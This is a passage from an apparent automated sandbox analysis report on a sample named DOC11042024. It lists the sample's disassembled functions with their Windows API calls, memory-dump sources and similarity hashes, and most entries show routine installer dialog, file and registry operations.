                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                              • Instruction ID: ec911db0b8c619780e49f71b5e9ab609bcb59fae62712e4cff539ceaca95a003
                                                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                              • Instruction Fuzzy Hash: 3221D8B1904744ABCB219F68ED0CB4B7BF8AF40700F048629FD51E66E1D738E944CB65
                                                                              Function 0040274B Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                              • String ID:
                                                                              • API String ID: 3294113728-0
                                                                              • Opcode ID: df77f28229bbaccc39bf73c4c5db6ebfc290fd5fb9ccd5e8600a83ff44d931df
                                                                              • Instruction ID: 8f2eeb27b46310380c0b86d598b6ff4c046000a4e2ea8bfa295f2e2cadfff445
                                                                              • Opcode Fuzzy Hash: df77f28229bbaccc39bf73c4c5db6ebfc290fd5fb9ccd5e8600a83ff44d931df
                                                                              • Instruction Fuzzy Hash: 7531AD71C00128BBCF216FA5CD89DAE7A79EF09364F10023AF521762E0C7795D419BA9
                                                                              Function 00402CB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402CCB
                                                                              • GetTickCount.KERNEL32 ref: 00402CE9
                                                                              • wsprintfW.USER32 ref: 00402D17
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                                • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                                • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402D3B
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402D49
                                                                                • Part of subcall function 00402C94: MulDiv.KERNEL32(0002449B,00000064,00029BE6), ref: 00402CA9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 722711167-2449383134
                                                                              • Opcode ID: 3f4537491708b4215e3c4a6d99a0c743b1687ebcf7d5ed95cc3645461213e600
                                                                              • Instruction ID: a1907478ddb902a072483e3d51deae3a5dd923dd16d25887805ca4762a99b5b8
                                                                              • Opcode Fuzzy Hash: 3f4537491708b4215e3c4a6d99a0c743b1687ebcf7d5ed95cc3645461213e600
                                                                              • Instruction Fuzzy Hash: 98015E30949214ABD721AB60AE4DBAE3A68AB01704B14407BF841B51E5CAF89D45DA9E
                                                                              Function 00404A20 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A3B
                                                                              • GetMessagePos.USER32 ref: 00404A43
                                                                              • ScreenToClient.USER32(?,?), ref: 00404A5D
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A6F
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404A95
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                              • Instruction ID: d8635a0d538a4f91798b510f0c456ee88aa9d085b2116d939b4b66b3bca73259
                                                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                              • Instruction Fuzzy Hash: 32015271E40219BADB10DB94DD45FFEBBBCAB58711F10412BBB10B71C0C7B4A9018B95
                                                                              Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401D44
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                              • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID: Times New Roman
                                                                              • API String ID: 3808545654-927190056
                                                                              • Opcode ID: 8d06ea3c060267aba26da0b87c592af6ff0513f004a4823b2904bc844afbdc39
                                                                              • Instruction ID: 3eb7276cbc1423a2d820568737168ee58b0f53162ed4bc453fdac92cce446bc3
                                                                              • Opcode Fuzzy Hash: 8d06ea3c060267aba26da0b87c592af6ff0513f004a4823b2904bc844afbdc39
                                                                              • Instruction Fuzzy Hash: FA01D631948280AFEB016BB0AE0BB9ABF74DF55305F104479F545B62E2C7790405DF6E
                                                                              Function 00402C15 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                                              • wsprintfW.USER32 ref: 00402C67
                                                                              • SetWindowTextW.USER32(?,?), ref: 00402C77
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C89
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                              • API String ID: 1451636040-1158693248
                                                                              • Opcode ID: 554fe6f9690c61400e4eda3edd1f4922ff9d37f4658182a2613de7d634146abe
                                                                              • Instruction ID: 48e59a72eb1afd3ccce1f90cad832feacbd2ac136dd55b0bdfc26f3f1c991dc6
                                                                              • Opcode Fuzzy Hash: 554fe6f9690c61400e4eda3edd1f4922ff9d37f4658182a2613de7d634146abe
                                                                              • Instruction Fuzzy Hash: F3F01270504109ABEF245F61DD49BAE3768AB00705F00843AFA15B51D0DBF99959CB99
                                                                              Function 00402571 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                                              • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                                                • Part of subcall function 00405DE9: wsprintfW.USER32 ref: 00405DF6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead$ByteCharMultiWidewsprintf
                                                                              • String ID: 9
                                                                              • API String ID: 3029736425-2366072709
                                                                              • Opcode ID: 0efa4354ff525d3079d6140453000556cb67621d6b508409ec9325c9c89c508a
                                                                              • Instruction ID: c4cd8ab1bbc4a9069a9adb6c21cf72f9a5641064d0b2c960c84d733a5925a05a
                                                                              • Opcode Fuzzy Hash: 0efa4354ff525d3079d6140453000556cb67621d6b508409ec9325c9c89c508a
                                                                              • Instruction Fuzzy Hash: 9C316170D0021AEADF20DF94DA88EBEB7B9FB10344F50447BE401B62D4D7B98A81CB59
                                                                              Function 00402B10 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Close$DeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 1912718029-0
                                                                              • Opcode ID: de1bec0198d5711d10fd85a40ffd3bd8e417e8644db3b6ce8e857f146d36a2dd
                                                                              • Instruction ID: cc4ad6e4774ad99ebc46e9603e3f84a1c50872ccdb4a22261381f2b766b1f9f0
                                                                              • Opcode Fuzzy Hash: de1bec0198d5711d10fd85a40ffd3bd8e417e8644db3b6ce8e857f146d36a2dd
                                                                              • Instruction Fuzzy Hash: A4114F7150010CFFDF119F90DE89DAA3B79EB04348F10047AFA05B11A0D3B9AE51EB69
                                                                              Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: a9f1956136b06e0d21c0be8457cce007b75485a25b1ad61ec76ed5e47bc5ce2b
                                                                              • Instruction ID: 9f239c48d4aaa00782f217baa2b30d914516c3821aac0afcf03912814d809b9c
                                                                              • Opcode Fuzzy Hash: a9f1956136b06e0d21c0be8457cce007b75485a25b1ad61ec76ed5e47bc5ce2b
                                                                              • Instruction Fuzzy Hash: FAF0E1B2A04105BFD701DBA4EE88DDE7BBCEB08341F100466F602F11A0C674AD418B39
                                                                              Function 0040493A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 004049CB
                                                                              • wsprintfW.USER32 ref: 004049D4
                                                                              • SetDlgItemTextW.USER32(?,004226D0), ref: 004049E7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s
                                                                              • API String ID: 3540041739-3551169577
                                                                              • Opcode ID: 2e4606acc9f48e4f9a88fe8c78b0c6640a39c8006bdf8dd1d9d6c2f7b0a7ada7
                                                                              • Instruction ID: 90bc30eb4fb9e50e243b5350af64a2c38dc69b27024c9e4725b9460d43b6fd17
                                                                              • Opcode Fuzzy Hash: 2e4606acc9f48e4f9a88fe8c78b0c6640a39c8006bdf8dd1d9d6c2f7b0a7ada7
                                                                              • Instruction Fuzzy Hash: 431126736001243BCB10666D9C45E9F365D9BC2335F140637FA69F61D0D9388D1286E8
                                                                              Function 0040590A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403306,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00405910
                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403306,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 0040591A
                                                                              • lstrcatW.KERNEL32(?,00409014), ref: 0040592C
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040590A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-823278215
                                                                              • Opcode ID: 1447656032315978b1f69cf749e7b3958b60c33623e7124d34fd1eba4ba6eb1c
                                                                              • Instruction ID: 42ff842ad4801a4078384bf2e5d5b139b5e6e65dd3ea51437ef0ee7d13eb97eb
